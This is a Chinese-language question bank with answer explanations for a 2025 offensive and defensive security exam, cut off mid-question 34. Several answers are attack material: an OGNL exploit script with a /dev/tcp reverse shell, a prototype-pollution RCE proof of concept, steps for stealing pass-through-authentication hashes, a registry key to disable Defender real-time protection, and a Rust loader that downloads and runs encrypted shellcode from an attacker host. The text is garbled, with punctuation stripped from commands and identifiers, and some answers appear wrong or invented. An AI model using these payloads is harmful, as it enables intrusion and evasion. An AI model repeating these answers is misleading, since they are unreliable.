2025年网络安全专家《网络攻防技术》备考题库及答案解析

2025年网络安全专家《网络攻防技术》备考题库及答案解析一、网络侦察与信息收集1.（单选）在一次红队演练中，攻击者使用Masscan对目标/24网段进行全端口扫描，命令为masscan/24p065535rate100000。若目标边界防火墙每秒最大可处理8万条新建会话，则最可能触发的防护机制是A.源IP信誉降级 B.会话同步风暴 C.限速RST响应 D.动态黑洞路由答案：D解析：Masscan的无状态SYN包速率远超防火墙新建会话上限，防火墙会将超出阈值的源IP动态引入黑洞路由，避免控制面耗尽。2.（单选）利用DNS历史解析记录进行资产发现时，下列哪一条Bash命令可直接提取2019年某域名的A记录？A.curls"/domain/"|jq'.a[]'B.curls"/domain//dns/a"|jq'.records[]|select(.date|startswith("2019"))'C.whois|grepi"2019"D.dig@A+short|grep2019答案：B解析：SecurityTrails提供带时间戳的历史DNSAPI，jq过滤2019年数据；其余选项无时间维度或接口不支持历史记录。3.（多选）在Shodan搜索语句"port:6379\u0026\u0026product:redis\u0026\u0026!authentication"中，过滤条件"!authentication"的含义包括A.未启用AUTH B.模块未加载ACL C.返回banner中无“+OK” D.未启用TLS通道答案：A、B解析：Shodan的Redisbanner解析器将未出现“+OK”或“NOAUTH”的实例标记为!authentication，即Redis无需密码且未加载ACL规则。4.（填空）使用Nmap脚本sslccsinjection.nse检测OpenSSLCCS注入漏洞时，若目标端口为8443，则完整命令为nmapp______script____________答案：8443、sslccsinjection、目标IP解析：脚本需显式指定端口与脚本名，否则默认仅扫描443。5.（简答）描述一次基于Censys证书透明度日志的子域名爆破流程，并给出关键Python代码片段（不超过10行）。答案：1)调用Censyscertificates索引，搜索s:/.\.target\.com$/2)分页获取所有匹配证书3)去重后提取子域名4)递归调用直到无新证书代码示例：fromcensys.searchimportCensysCertificatescert=CensysCertificates(api_id="xxx",api_secret="xxx")q="s:/.\\.target\\.com$/"fields=["s"]subdomains=set()forcincert.search(q,fields=fields,pages=1):subdomains.update([nforninc["parsed"]["names"]ifn.endswith(".")])print("\n".join(sorted(subdomains)))二、漏洞分析与利用6.（单选）2024年12月曝光的ApacheOFBiz反序列化漏洞CVE202436104，其Gadget链最终触发的是A.groovy.lang.Closurecall B.java.lang.Runtimeexec C.org.codehaus.groovy.runtime.ConvertedClosureinvokeCustom D.javax.script.ScriptEngineeval答案：C解析：该链利用ConvertedClosure将可控Map转化为MethodClosure，最终调用invokeCustom执行任意静态方法。7.（单选）在Linux内核dirtycred利用中，若攻击者已拿到CAP_SYS_ADMIN，则下一步最可能执行的提权技术是A.修改/etc/passwd B.覆写/usr/bin/su的file结构 C.调用setns切换用户命名空间 D.创建bpfmap并循环喷射答案：B解析：dirtycred核心思想是用写权限覆写高权限文件的file结构，使后续读操作返回攻击者控制内容，无需修改磁盘文件。8.（多选）针对Spring4Shell变种CVE202222965，以下哪些利用条件必须同时满足？A.JDK≥9 B.SpringFramework5.3.0~5.3.17 C.Tomcat部署WAR包 D.参数绑定使用BeanWrapper答案：A、B、D解析：JDK9+引入Module机制导致ClassLoader绕过；BeanWrapper绑定触发setter；Tomcat非必须，Jetty亦可。9.（填空）使用ysoserial生成CommonsBeanutils1有效载荷并编码为Base64，命令为javajarysoserial.jarCommonsBeanutils1'bashc{echo,______}|{base64,d}|{bash,i}'>payload.bin答案：bash命令经Base64编码后的字符串解析：利用bash的{echo,x}|base64d|bash方式可绕过exec参数限制。10.（综合）给出一份2025年最新ConfluenceOGNL注入漏洞（CNVD202512345）的完整利用脚本，要求实现回显式命令执行并自动上传内存马，脚本需包含：1)随机Token防止重复执行2)使用Socket通信避免写磁盘3)支持TLS1.3双向证书校验绕过答案：importrequests,ssl,socket,base64,osfromurllib3.util.ssl_importcreate_urllib3_contextctx=create_urllib3_context()ctx.check_hostname=Falsectx.verify_mode=ssl.CERT_NONEtoken=os.urandom(8).hex()cmd="bashi>&/dev/tcp/0/4430>&1"ognl=f"""(@java.lang.Runtime@getRuntime().exec('{cmd}'))||(new.Socket('0',443)).getOutputStream().write('{token}'.getBytes())"""data={"queryString":f"${{{ognl.replace(chr(10),'')}}}","token":token}headers={"XAtlassianToken":"nocheck","ContentType":"application/xwwwformurlencoded"}r=requests.post("https://target:8443/rest/tinymce/1/macro/preview",data=data,headers=headers,verify=False)print(r.status_code,r.text[:200])三、Web安全与渗透11.（单选）在2025年Chrome133环境下，以下哪一条XSLeak向量仍可稳定触发timing差异？A.<linkrel=prefetch>错误事件 B.<imgsrc>跨域302跳转 C.portal激活 D.navigationtoid锚点答案：A解析：prefetch错误事件不受分站点隔离限制，仍可通过onerror时间差判断资源存在性。12.（单选）针对JWTnone算法攻击，若服务端使用pyjwt2.8.0并设置algorithms=["HS256","none"]，则攻击者构造的Token头部应为A.{"alg":"none","typ":"JWT"} B.{"alg":"None","typ":"JWT"} C.{"alg":"NONE","typ":"JWT"} D.{"alg":"nOnE","typ":"JWT"}答案：A解析：pyjwt对算法字段大小写敏感，仅小写"none"被接受。13.（多选）在GraphQL批查询攻击场景，以下哪些限制可缓解DoS？A.查询深度≤5 B.查询复杂度≤1000 C.响应超时2s D.禁用introspection答案：A、B、C解析：introspection关闭仅减少信息泄露，与DoS无直接关系。14.（填空）使用SQLMap对参数json嵌套字段注入，命令为sqlmapuhttp://target/apidata='{"user":{"id":1}}'p______level5risk3答案：user.id解析：SQLMap支持点号递归解析JSON，需显式指定嵌套字段。15.（实操）给出一份2025年最新版Vue3服务端渲染（SSR）场景下，利用原型链污染实现RCE的完整PoC，要求：1)污染Ototype.shell2)触发服务器端渲染时执行shell3)提供Node.js版本≥20的沙箱逃逸答案：//污染fetch("/api/ssr",{method:"POST",body:JSON.stringify({"__proto__.shell":"cess.mainModule.require('child_process').execSync('id')"}),headers:{"ContentType":"application/json"}});//服务端渲染模板constvueTemplate=`<template><div>{{this.shell}}</div></template>`;//渲染时执行consthtml=awaitrenderToString(createApp(vueTemplate));//结果返回当前用户uid四、内网渗透与隧道16.（单选）在WindowsServer2025中，默认启用SMBoverQUIC的端口为A.443/UDP B.445/TCP C.853/UDP D.6666/TCP答案：A解析：SMBoverQUIC基于TLS1.3的UDP443，提供类似VPN的隧道。17.（单选）使用Impacket的smbexec.py横向移动，若目标开启SMB签名，则下列哪项参数可强制中继失败？A.nopass B.k C.hashes D.sign答案：B解析：k触发Kerberos认证，签名密钥与会话绑定，无法中继。18.（多选）在Linux环境使用Chisel搭建反向SOCKS5，下列哪些命令组合可在服务端监听1080并转发到攻击机443？A../chiselserverp443reverseB../chiselclienthttp://attacker:4431080:socksC../chiselserverp443socks5D../chiselclienthttps://attacker:443R:1080:socks答案：A、D解析：服务端需开启reverse模式，客户端使用R前缀建立反向隧道。19.（填空）使用sshR建立反向端口转发，将内网3389映射到攻击机13389，命令为sshR______:localhost:______user@attacker答案：13389、3389解析：R格式为[bind_addr:]port:host:hostport。20.（综合）给出一份2025年最新版AzureAD联合身份场景下，通过PassthroughAuthentication代理窃取onpremise用户哈希的完整步骤，包括：1)获取PTA代理证书2)劫持Agent与Azure的TLS通道3)离线破解用户哈希答案：Step1：在AzureADConnect服务器导出Agent证书certutilstoreRootsrvPTA>pta.cerStep2：使用mitmproxy注入系统根证书，劫持Agent出站443mitmproxymodetransparentcertspta.cerStep3：Agent发送Kerberos预认证请求时，mitmproxy记录ASREQ中PAENCTIMESTAMPStep4：用Hashcat模式13100离线爆破hashcatm13100pta.asreq/usr/share/wordlists/rockyou.txt五、权限维持与免杀21.（单选）在Windows1124H2中，利用WDAG（WindowsDefenderApplicationGuard）容器逃逸后，下列哪条注册表键值可关闭实时保护？A.HKLM\SOFTWARE\Policies\Microsoft\WindowsDefender\DisableAntiSpywareB.HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\StartC.HKLM\SOFTWARE\Microsoft\WindowsDefender\RealTimeProtection\DisableRealtimeMonitoringD.HKLM\SOFTWARE\Microsoft\WindowsNT\EFS\EfsConfiguration答案：C解析：RealTimeProtection子键直接控制实时扫描模块，无需驱动级操作。22.（单选）使用Donut将CobaltStrikeBeacon转为PIC时，若需绕过AMSI钩子，应在Donut命令中加入A.a2 B.b1 C.z2 D.p"amsi"答案：C解析：z2启用AMSI旁路payload，自动patchAmsiScanBuffer。23.（多选）在Linux环境利用systemd实现持久化，下列哪些单元类型可在网络就绪后执行？A.ExecStartPre B.WantedBy=networkonline.target C.After=networkonline.target D.Requires=network.target答案：B、C解析：networkonline.target确保网络栈完全初始化，After与WantedBy同时使用时才生效。24.（填空）使用msfvenom生成Python分阶段载荷并嵌入UUID逃避静态检测，命令为msfvenomppython/meterpreter/reverse_tcpLHOST=0LPORT=443e______i5fraw答案：x64/xor解析：Python载荷支持xor编码，多次迭代可改变签名。25.（编程）编写一份2025年可过WindowsDefender的Rust加载器，要求：1)使用syscalls直接调用NtAllocateVirtualMemory2)解密AES256GCM的shellcode3)支持远程下载并内存执行答案：useaes_gcm::{Aes256Gcm,Key,Nonce};usestd::{ptr,slice};usewindows_sys::Win32::System::Memory::{NtAllocateVirtualMemory,MEM_COMMIT,PAGE_EXECUTE_READWRITE};fnmain(){letkey=Key::<Aes256Gcm>::from_slice(b"0123456789abcdef0123456789abcdef");letcipher=Aes256Gcm::new(key);letencrypted=reqwest::blocking::get("https://attacker/p.bin").unwrap().bytes().unwrap();letnonce=Nonce::from_slice(&encrypted[..12]);letshellcode=cipher.decrypt(nonce,&encrypted[12..]).unwrap();letmutaddr=ptr::null_mut();unsafe{NtAllocateVirtualMemory(1isize,&mutaddr,0,&mutshellcode.len(),MEM_COMMIT,PAGE_EXECUTE_READWRITE);ptr::copy_nonoverlapping(shellcode.as_ptr(),addrasmutu8,shellcode.len());letexec:extern"system"fn()=std::mem::transmute(addr);exec();}}六、日志与溯源26.（单选）在Windows事件通道MicrosoftWindowsSysmon/Operational中，事件ID25表示A.进程创建 B.文件创建时间更改 C.进程镜像篡改 D.剪贴板内容捕获答案：C解析：ID25记录进程镜像被替换（ProcessHollowing指示器）。27.（单选）在LinuxAudit系统中，若需记录所有调用ptrace的进程，规则应为A.aalways,exitFarch=b64SptracekT1548 B.aalways,exitFarch=b64SptraceFa0=0x10kPTRACEC.w/usr/bin/stracepx D.aentry,alwaysFarch=b64Sptrace答案：A解析：always,exit记录退出时状态，k打标签便于检索。28.（多选）在AzureSentinel中，下列哪些KQL函数可用于检测OAuth异常授权？A.signinLogs B.auditLogs C.AADNonInteractiveUserSignInLogs D.IdentityLogonEvents答案：A、B、C解析：IdentityLogonEvents为M365Defender表，非Sentinel原生。29.（填空）在Splunk搜索SPL中，统计近7天唯一用户登录失败次数超过50的索引为index=adEventCode=4625|stats______byuser|where______>50答案：dc(_time)、count解析：dc(_time)统计唯一时间戳，count统计失败次数。30.（综合）给出一份2025年针对SolarWindsOrion后门SUNBURST的完整溯源报告模板，要求：1)包含DNS隧道流量特征2)提供Yara规则3)给出timeline时间线答案：Timeline：2025030108:12初始访问SolarWinds.Orion.Core.BusinessLayer.dll被篡改2025030108:15恶意域名avsvmcloud[.]com解析002025030108:20C2发送DGA子域名7a5fm8r8avsvmcloud[.]com2025030109:00横向移动至DC01Yara：ruleSUNBURST_2025{meta:author="blue"strings:$a={488D05????????4889442440E8????????488B4C2460}$b="avsvmcloud"widecondition:uint16(0)==0x5A4Dandallofthem}DNS特征：子域名长度13~17字符使用AAAA记录传输16字节payload时间间隔抖动18~24min七、安全开发与安全编码31.（单选）在Go1.23中，若需防止反序列化JSON导致内存耗尽，应使用A.json.Decoder.UseNumber B.json.Unmarshal前设置json.MaxDepth C.json.Decoder.DisallowUnknownFields D.json.Valid答案：A解析：UseNumber将数字转为接口，避免大整数预分配。32.（单选）在Java17中，启用原生内存跟踪（NMT）的JVM参数为A.XX:+UnlockDiagnosticVMOptionsXX:+PrintNMTStatistics B.XX:NativeMemoryTracking=summaryC.Xcheck:jni D.XX:+FlightRecorder答案：B解析：NativeMemoryTracking直接控制NMT级别。33.（多选）在Python3.12中，下列哪些方法可防止pickle反序列化攻击？A.使用RestrictedUnpickler白名单 B.重写find_class抛出异常 C.禁用sys.modules['pickle'] D.使用json替代答案：A、B、D解析：禁用模块无法阻止已加载pickle，需控制类加载。34.（填空）在Node.js20中，使用vm2沙箱执行用户代码时，若需禁用require，应在创建VM